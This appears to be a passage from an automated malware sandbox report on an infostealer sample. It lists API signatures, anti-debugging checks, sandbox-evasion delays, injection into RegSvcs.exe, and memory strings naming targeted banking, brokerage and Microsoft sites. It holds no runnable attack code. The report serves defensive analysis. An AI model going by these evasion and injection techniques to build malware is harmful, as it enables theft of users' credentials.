                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599886Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599782Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599657Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599407Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599282Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599157Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597489Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596491Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596266Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596141Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596032Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595907Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595782Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594829Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594704Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594579Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594454Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594079Jump to behavior
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: RegSvcs.exe, 00000002.00000002.4597170534.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003BD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: RegSvcs.exe, 00000002.00000002.4601365482.0000000003EEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_03FAA718 mov eax, dword ptr fs:[00000030h]0_2_03FAA718
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_03FA8560 mov eax, dword ptr fs:[00000030h]0_2_03FA8560
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_03FA8500 mov eax, dword ptr fs:[00000030h]0_2_03FA8500
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_03FABD68 mov eax, dword ptr fs:[00000030h]0_2_03FABD68
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_03FABD08 mov eax, dword ptr fs:[00000030h]0_2_03FABD08
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B16008Jump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SP0npSA64a.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
                  Source: SP0npSA64a.exeBinary or memory string: Shell_TrayWnd
                  Source: SP0npSA64a.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,0_2_0041E364
                  Source: C:\Users\user\Desktop\SP0npSA64a.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000002.00000002.4598521069.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SP0npSA64a.exe.3010000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.SP0npSA64a.exe.3010000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4595913183.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2227274454.0000000003010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SP0npSA64a.exe PID: 6220, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7164, type: MEMORYSTR
